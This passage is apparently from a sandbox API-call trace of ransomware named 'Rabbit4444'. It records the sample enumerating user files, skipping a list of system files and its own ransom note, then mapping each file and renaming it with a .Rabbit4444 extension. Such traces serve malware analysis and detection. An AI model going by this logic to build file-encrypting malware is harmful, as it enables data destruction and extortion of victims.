"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6ca1f1ce-1fed-4d96-a82e-08cedb139aa3}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.973] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51383b03, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51383b03, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232db48a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", cAlternateFileName="CLE4AD~1.SET")) returned 1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2=".") returned 1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="..") returned 1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="windows") returned -1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="boot") returned 1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.973] lstrcmpiW (lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.973] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms" | out: lpString1="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms") returned="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms" [0058.973] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.973] lstrlenW (lpString="Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms") returned 64 [0058.973] lstrlenW (lpString="Rabbit4444") returned 10 [0058.973] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.973] lstrlenW (lpString=".dll") returned 4 [0058.973] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.973] lstrlenW (lpString=".lnk") returned 4 [0058.973] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.973] lstrlenW (lpString=".ini") returned 4 [0058.973] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.973] lstrlenW (lpString=".sys") returned 4 [0058.973] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6cba2898-2efe-4604-9933-f1f64dae2a32}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.974] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.974] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15028457164) returned 1 [0058.974] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1206) returned 1 [0058.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0058.974] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0058.977] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0058.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.978] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.978] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.978] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.978] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.978] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15028923513) returned 1 [0058.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0058.979] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.979] CloseHandle (hObject=0x298) returned 1 [0058.979] CloseHandle (hObject=0x278) returned 1 [0058.979] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms.Rabbit4444") returned 192 [0058.979] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6cba2898-2efe-4604-9933-f1f64dae2a32}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6cba2898-2efe-4604-9933-f1f64dae2a32}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.980] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x516a4cd0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x516a4cd0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x335, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", cAlternateFileName="CLBD5D~1.SET")) returned 1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2=".") returned 1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="..") returned 1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="windows") returned -1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="boot") returned 1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.980] lstrcmpiW (lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.980] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms" | out: lpString1="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms") returned="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms" [0058.980] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.980] lstrlenW (lpString="Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms") returned 64 [0058.980] lstrlenW (lpString="Rabbit4444") returned 10 [0058.980] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.980] lstrlenW (lpString=".dll") returned 4 [0058.980] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.980] lstrlenW (lpString=".lnk") returned 4 [0058.980] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.980] lstrlenW (lpString=".ini") returned 4 [0058.980] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.980] lstrlenW (lpString=".sys") returned 4 [0058.980] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.980] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.981] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.981] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15029153679) returned 1 [0058.981] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=821) returned 1 [0058.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.981] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0058.982] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0058.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.983] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15029403199) returned 1 [0058.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.983] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.983] CloseHandle (hObject=0x298) returned 1 [0058.984] CloseHandle (hObject=0x278) returned 1 [0058.984] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms.Rabbit4444") returned 192 [0058.984] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.984] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x517fc1ff, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x517fc1ff, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", cAlternateFileName="CLF8F5~1.SET")) returned 1 [0058.984] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.984] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.984] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.984] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2=".") returned 1 [0058.984] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="..") returned 1 [0058.984] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="windows") returned -1 [0058.985] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.985] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.985] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="boot") returned 1 [0058.985] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.985] lstrcmpiW (lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.985] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms" | out: lpString1="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms") returned="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms" [0058.985] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.985] lstrlenW (lpString="Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms") returned 64 [0058.985] lstrlenW (lpString="Rabbit4444") returned 10 [0058.985] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.985] lstrlenW (lpString=".dll") returned 4 [0058.985] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.985] lstrlenW (lpString=".lnk") returned 4 [0058.985] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.985] lstrlenW (lpString=".ini") returned 4 [0058.985] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.985] lstrlenW (lpString=".sys") returned 4 [0058.985] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.985] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{71d0780f-10d2-459c-983b-94a642161220}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.986] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.986] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15029633036) returned 1 [0058.986] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=991) returned 1 [0058.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.986] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0058.987] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0058.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.988] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15029924646) returned 1 [0058.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.989] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.989] CloseHandle (hObject=0x298) returned 1 [0058.989] CloseHandle (hObject=0x278) returned 1 [0058.989] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms.Rabbit4444") returned 192 [0058.989] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{71d0780f-10d2-459c-983b-94a642161220}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{71d0780f-10d2-459c-983b-94a642161220}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.990] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x518badc6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x518badc6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x338, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", cAlternateFileName="CL2891~1.SET")) returned 1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2=".") returned 1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="..") returned 1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="windows") returned -1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="boot") returned 1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.990] lstrcmpiW (lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.990] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms" | out: lpString1="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms") returned="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms" [0058.990] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.990] lstrlenW (lpString="Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms") returned 64 [0058.990] lstrlenW (lpString="Rabbit4444") returned 10 [0058.990] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.990] lstrlenW (lpString=".dll") returned 4 [0058.990] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.990] lstrlenW (lpString=".lnk") returned 4 [0058.990] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.991] lstrlenW (lpString=".ini") returned 4 [0058.991] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.991] lstrlenW (lpString=".sys") returned 4 [0058.991] lstrcmpiW (lpString1="t-ms", lpString2=".sys") 